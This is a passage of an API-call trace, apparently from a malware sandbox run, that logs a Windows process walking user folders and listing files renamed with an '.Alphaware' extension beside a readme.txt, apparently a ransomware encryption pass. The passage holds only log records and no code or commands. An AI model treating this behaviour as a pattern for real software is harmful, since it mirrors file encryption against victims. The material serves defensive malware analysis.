pinned\\taskbar\\*"), lpFindFileData=0x23e6c0 | out: lpFindFileData=0x23e6c0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x795fff90, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x8a0cc380, ftLastAccessTime.dwHighDateTime=0x1d9897a, ftLastWriteTime.dwLowDateTime=0x8a0cc380, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xd8a310 [0093.711] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e6f0 | out: lpFindFileData=0x23e6f0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x795fff90, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x8a0cc380, ftLastAccessTime.dwHighDateTime=0x1d9897a, ftLastWriteTime.dwLowDateTime=0x8a0cc380, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0093.712] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e6f0 | out: lpFindFileData=0x23e6f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x799de350, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x799de350, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x89c55a40, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x2f4, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini.Alphaware", cAlternateFileName="DESKTO~1.ALP")) returned 1 [0093.712] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e6f0 | out: lpFindFileData=0x23e6f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7f0f5210, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x7f0f5210, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x89cedfc0, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x860, dwReserved0=0x0, dwReserved1=0x0, cFileName="Internet Explorer (2).lnk.Alphaware", cAlternateFileName="INTERN~1.ALP")) returned 1 [0093.712] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e6f0 | out: lpFindFileData=0x23e6f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x799de350, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x799de350, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x89eb7040, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x860, dwReserved0=0x0, dwReserved1=0x0, cFileName="Internet Explorer.lnk.Alphaware", cAlternateFileName="INTERN~2.ALP")) returned 1 [0093.712] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e6f0 | out: lpFindFileData=0x23e6f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x89c7bba0, ftCreationTime.dwHighDateTime=0x1d9897a, ftLastAccessTime.dwLowDateTime=0x89c7bba0, ftLastAccessTime.dwHighDateTime=0x1d9897a, ftLastWriteTime.dwLowDateTime=0x89c7bba0, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x49d, dwReserved0=0x0, dwReserved1=0x0, cFileName="readme.txt", cAlternateFileName="")) returned 1 [0093.712] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e6f0 | out: lpFindFileData=0x23e6f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7f10d8b0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x7f10d8b0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x89f03300, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x734, dwReserved0=0x0, dwReserved1=0x0, cFileName="Windows Explorer (2).lnk.Alphaware", cAlternateFileName="WINDOW~1.ALP")) returned 1 [0093.712] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e6f0 | out: lpFindFileData=0x23e6f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x799de350, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x799de350, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x89f9b880, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x734, dwReserved0=0x0, dwReserved1=0x0, cFileName="Windows Explorer.lnk.Alphaware", cAlternateFileName="WINDOW~2.ALP")) returned 1 [0093.712] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e6f0 | out: lpFindFileData=0x23e6f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7f125f50, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x7f125f50, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x8a00dca0, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x8e0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Windows Media Player (2).lnk.Alphaware", cAlternateFileName="WINDOW~3.ALP")) returned 1 [0093.712] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e6f0 | out: lpFindFileData=0x23e6f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x799de350, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x799de350, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x8a0cc380, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x8e0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Windows Media Player.lnk.Alphaware", cAlternateFileName="WINDOW~4.ALP")) returned 1 [0093.712] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e6f0 | out: lpFindFileData=0x23e6f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x799de350, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x799de350, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x8a0cc380, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x8e0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Windows Media Player.lnk.Alphaware", cAlternateFileName="WINDOW~4.ALP")) returned 0 [0093.712] FindClose (in: hFindFile=0xd8a310 | out: hFindFile=0xd8a310) returned 1 [0093.713] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e618) returned 1 [0093.713] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e838) returned 1 [0093.713] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23eaf8) returned 1 [0093.713] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Network", nBufferLength=0x105, lpBuffer=0x23e5a0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Network", lpFilePart=0x0) returned 0x34 [0093.713] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Network\\*" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\network\\*"), lpFindFileData=0x23e8a0 | out: lpFindFileData=0x23e8a0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x82d9eea0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x82d9eea0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x82d9eea0, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xd8a310 [0093.714] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e8d0 | out: lpFindFileData=0x23e8d0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x82d9eea0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x82d9eea0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x82d9eea0, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0093.714] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e8d0 | out: lpFindFileData=0x23e8d0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x82d9eea0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x82d9eea0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x82d9eea0, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Connections", cAlternateFileName="CONNEC~1")) returned 1 [0093.714] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e8d0 | out: lpFindFileData=0x23e8d0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x82d9eea0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x82d9eea0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x82d9eea0, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Connections", cAlternateFileName="CONNEC~1")) returned 0 [0093.714] FindClose (in: hFindFile=0xd8a310 | out: hFindFile=0xd8a310) returned 1 [0093.714] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e7f8) returned 1 [0093.714] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23ea18) returned 1 [0093.714] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23eaf8) returned 1 [0093.714] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Network", nBufferLength=0x105, lpBuffer=0x23e5a0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Network", lpFilePart=0x0) returned 0x34 [0093.715] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Network\\*" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\network\\*"), lpFindFileData=0x23e8a0 | out: lpFindFileData=0x23e8a0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x82d9eea0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x82d9eea0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x82d9eea0, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xd8a310 [0093.715] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e8d0 | out: lpFindFileData=0x23e8d0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x82d9eea0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x82d9eea0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x82d9eea0, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0093.715] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e8d0 | out: lpFindFileData=0x23e8d0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x82d9eea0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x82d9eea0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x82d9eea0, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Connections", cAlternateFileName="CONNEC~1")) returned 1 [0093.715] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e8d0 | out: lpFindFileData=0x23e8d0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0093.715] FindClose (in: hFindFile=0xd8a310 | out: hFindFile=0xd8a310) returned 1 [0093.715] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e7f8) returned 1 [0093.715] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23ea18) returned 1 [0093.715] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23ea58) returned 1 [0093.715] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Network\\Connections", nBufferLength=0x105, lpBuffer=0x23e500, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Network\\Connections", lpFilePart=0x0) returned 0x40 [0093.716] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Network\\Connections\\*" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\network\\connections\\*"), lpFindFileData=0x23e800 | out: lpFindFileData=0x23e800*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x82d9eea0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x82d9eea0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x82d9eea0, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xd8a310 [0093.716] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e830 | out: lpFindFileData=0x23e830*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x82d9eea0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x82d9eea0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x82d9eea0, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0093.716] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e830 | out: lpFindFileData=0x23e830*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x82d9eea0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x82d9eea0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x82d9eea0, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Pbk", cAlternateFileName="")) returned 1 [0093.716] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e830 | out: lpFindFileData=0x23e830*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x82d9eea0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x82d9eea0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x82d9eea0, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Pbk", cAlternateFileName="")) returned 0 [0093.716] FindClose (in: hFindFile=0xd8a310 | out: hFindFile=0xd8a310) returned 1 [0093.716] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e758) returned 1 [0093.716] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e978) returned 1 [0093.716] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23ea58) returned 1 [0093.716] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Network\\Connections", nBufferLength=0x105, lpBuffer=0x23e500, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Network\\Connections", lpFilePart=0x0) returned 0x40 [0093.717] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e830 | out: lpFindFileData=0x23e830*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x82d9eea0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x82d9eea0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x82d9eea0, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0093.717] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e830 | out: lpFindFileData=0x23e830*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x82d9eea0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x82d9eea0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x82d9eea0, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Pbk", cAlternateFileName="")) returned 1 [0093.717] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e830 | out: lpFindFileData=0x23e830*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0093.717] FindClose (in: hFindFile=0xd8a310 | out: hFindFile=0xd8a310) returned 1 [0093.717] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e758) returned 1 [0093.717] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e978) returned 1 [0093.717] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e9b8) returned 1 [0093.717] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e790 | out: lpFindFileData=0x23e790*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x82d9eea0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x82d9eea0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x82d9eea0, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0093.718] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e790 | out: lpFindFileData=0x23e790*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x82d9eea0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x82d9eea0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x82d9eea0, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="_hiddenPbk", cAlternateFileName="_HIDDE~1")) returned 1 [0093.718] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e790 | out: lpFindFileData=0x23e790*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x82d9eea0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x82d9eea0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x82d9eea0, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="_hiddenPbk", cAlternateFileName="_HIDDE~1")) returned 0 [0093.718] FindClose (in: hFindFile=0xd8a310 | out: hFindFile=0xd8a310) returned 1 [0093.718] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e6b8) returned 1 [0093.718] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e8d8) returned 1 [0093.718] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e9b8) returned 1 [0093.718] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e790 | out: lpFindFileData=0x23e790*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x82d9eea0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x82d9eea0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x82d9eea0, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0093.718] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e790 | out: lpFindFileData=0x23e790*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x82d9eea0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x82d9eea0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x82d9eea0, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="_hiddenPbk", cAlternateFileName="_HIDDE~1")) returned 1 [0093.718] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e790 | out: lpFindFileData=0x23e790*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0093.718] FindClose (in: hFindFile=0xd8a310 | out: hFindFile=0xd8a310) returned 1 [0093.718] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e6b8) returned 1 [0093.718] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e8d8) returned 1 [0093.719] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e918) returned 1 [0093.719] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e6f0 | out: lpFindFileData=0x23e6f0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x82d9eea0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x82d9eea0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x82d9eea0, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0093.719] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e6f0 | out: lpFindFileData=0x23e6f0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x82d9eea0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x82d9eea0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x82d9eea0, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="rasphone.pbk", cAlternateFileName="")) returned 1 [0093.719] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e6f0 | out: lpFindFileData=0x23e6f0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0093.719] FindClose (in: hFindFile=0xd8a310 | out: hFindFile=0xd8a310) returned 1 [0093.719] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e618) returned 1 [0093.719] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e838) returned 1 [0093.719] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e918) returned 1 [0093.720] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e6f0 | out: lpFindFileData=0x23e6f0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x82d9eea0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x82d9eea0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x82d9eea0, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0093.720] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e6f0 | out: lpFindFileData=0x23e6f0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x82d9eea0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x82d9eea0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x82d9eea0, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="rasphone.pbk", cAlternateFileName="")) returned 1 [0093.720] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e6f0 | out: lpFindFileData=0x23e6f0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x82d9eea0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x82d9eea0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x82d9eea0, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="rasphone.pbk", cAlternateFileName="")) returned 0 [0093.720] FindClose (in: hFindFile=0xd8a310 | out: hFindFile=0xd8a310) returned 1 [0093.720] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e618) returned 1 [0093.720] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e838) returned 1 [0093.720] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23eaf8) returned 1 [0093.746] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e8d0 | out: lpFindFileData=0x23e8d0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x28666ef0, ftCreationTime.dwHighDateTime=0x1d70912, ftLastAccessTime.dwLowDateTime=0x2b32ecd0, ftLastAccessTime.dwHighDateTime=0x1d70912, ftLastWriteTime.dwLowDateTime=0x2b32ecd0, ftLastWriteTime.dwHighDateTime=0x1d70912, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0093.747] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e8d0 | out: lpFindFileData=0x23e8d0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x2868d050, ftCreationTime.dwHighDateTime=0x1d70912, ftLastAccessTime.dwLowDateTime=0x2868d050, ftLastAccessTime.dwHighDateTime=0x1d70912, 